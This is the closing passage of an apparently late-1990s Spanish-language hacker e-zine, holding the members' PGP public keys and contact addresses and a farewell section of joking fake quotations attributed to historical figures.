JstoXp18mAkKjX4t7eRdefXUkk+bGI78KqdLfDL2Qle3CH8IF3KiutapQvMF6PlT
ETlPtvFuuUs4INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ+PVZ
X9x2Uk89PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarTW56N
oKVyOtQa8L9GAFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY7288kj
wEPwpVsYjY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obE
AxnIByl6ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XrPdYXAAIC
EACSSTN7roDGRmGohAOsqJpI60PKdgjCKGWrVYynv10Olg7V5Pycq3GV1+ZJydhn
UKs/x8MxghHj/VwZ5FftDYiK/za0Tnq1E63HEj43BLbvrGwnsov7wNiknzvjnEHp
UCc84uYhFqKaPfWafDLWKI4GsTI0x7RgQ0Vpn6Kxu/necFnT/AmEUvFQPkkBl8xI
5znTLn9wwb2FlOq2HBRW4F+bQaQaKpL5fWGFWw1ZPmven2RvA5XyeDuUBsbj/OkL
RQu9VlXb3mmD/rl0rzHK5tqPOmCp3IFTp/JY9TNbA1wEMC+WHsk1P2sE3fOYwP/0
w8xz2WpN83N12XB/rgrMaKUOrqn8sq7khYIasZITKZ23QAUAHu3mspVBjYvTKFqF
ih2xtEZi7rFeROxSM3gSobWbbL7eXYT1fXZkKYP5w3POD50vw2an9qItdCXjv9wz
7xD6ent7YpOiloPnal+3GMEHSsAPEwsfzz1l3Eirs6v5hMJQwiWJWRYwQe2rO/4Z
gCNl+2FFUTonOOIIetMxENwSNpBH4PGboLZj/sj3IyNJGa0C7fu+1qHVFF0pxSIR
KavkOPFl8BW4TnJCUCMa13QfxATvOqOiC9Y4ZVaUr9wD2+Czgd+xByFI7gwFQWgD
ZYr57ytKKcsFc8wp9ru+K2iv0CMkQs7QyvxbRN4qjZz4NIkAPwMFGDV6jbPzs12Y
6YPcYhECP48AoOk2UN0H/aa/dMjCjPZMPLs0Dt38AJ9ryQhkTcLGOLQOWZiGR2Fp
4XwaDg==
=crAP
-----END PGP PUBLIC KEY BLOCK-----
<<::Azumlord::>> // azumlord@iname.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>
mQENAzPjTJ8AAAEIAPK1KI9F97qe09G16Rstzd1tlELbGmgRy8UPyzUkvMOTXIS9
onTp5gM3VEg8vJjCT9QrHsz6g0qRzttCO/+ixiHakVK3pzRO8EudwCVVEDECwAmM
aTDdspOZEn/mwoIO/UsAHAxQAuXNXL4JqscJ/ZNAlySchJgVk5KngyqMXlqpmwNW
CO7Gh4Ese2saJ++xvXWQHb+iBLHd/xo3cvNeJg5dFT2W/AjXa4WS/pXFmr5v8tut
yQIxJ4gw1XnEkoKlPIRQXLmHqs0Ct9069FbomKcfxb7mKbIIcAOhBKzhRtCQGiwJ
1yZOz61feAmCZTGT+wIcq0UGSeaQRzAu7Fxr5k0ABRG0IEF6dW0gTG9yZCA8QXp1
bUxvcmRAaG90bWFpbC5jb20+iQEVAwUQM+NMoEcwLuxca+ZNAQHi8ggAoRY+l28w
xlFbSB+Fb32pvBrHjuTSTtsfJqtKMbwx9Ot++3TWW9G+WgeHtdlSnMXMlfe5+Ft2
MxQwXfqMR4OzgyBVnkoaPH0Z2PBz6Cij44sLCrEQ+nZnpPAMTe60NCRphKwbXMGK
h8TNlIxxxPxtZSzO40dO4Rw5EkJcUQyykHmyHtzz/Ld7YfGYQmMEn40r2oX1k0/4
c8iJ1zrnzG6aiLKsvbm33SUx4wr9Q/0eBXALpijgzEs9PSau/ByCWEOwPJVpK2tQ
MaBF4rfm53UJxOCUBU8zYbG1rNUTY6UpYvvffnyaPzPoIZd2reYxY5i44WJCEXMF
+aRDrCB+VURqtg==
=r674
-----END PGP PUBLIC KEY BLOCK-----
Cytorax // cytorax@bigfoot.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>
mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0
e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD
95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR
tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn
TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ
FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz
oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s
=Xw7I
-----END PGP PUBLIC KEY BLOCK-----
Guybrush // guybrush@cyberdude.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>
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
WT2KqINEIKul1WKXCwr6
=yQRv
-----END PGP PUBLIC KEY BLOCK-----
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=( DESPEDIDA??? )=-
>> p0r 4zU/|\l0rd Y Cy70r4x <<
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NoTa: Solo apto para mentes rapidas, y claro con un poco de picardia
mexicana.
"No subira el dolar, ni el pan ni la tortilla...."
CSG antes de ocupar la presidencia
"Espionaje????, nosotros???"
El FBI despues del caso Casa Blanca
"Ya veras la transada que les doy a los gringos en esta
operacion de compraventa..............."
Santa Anna
"Esos nacos gritones no me causan ni un dolor de
cabeza"
Maria Antonieta, Reina de Francia
"No me volvere dictador aunque en ello me fuera
la vida.............."
Fidel Castro, Toma de Moncada
"¨ Traidor yo ?, !Anda a chingar a la mas vieja de tu casa"
Judas
Esperamos que les halla gustado si tienen alguna duda o sugerencia favor de
comunicarlos a los telefonos 01-800-RareGaZz-HoTLiNe, nos vemos la proxima.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=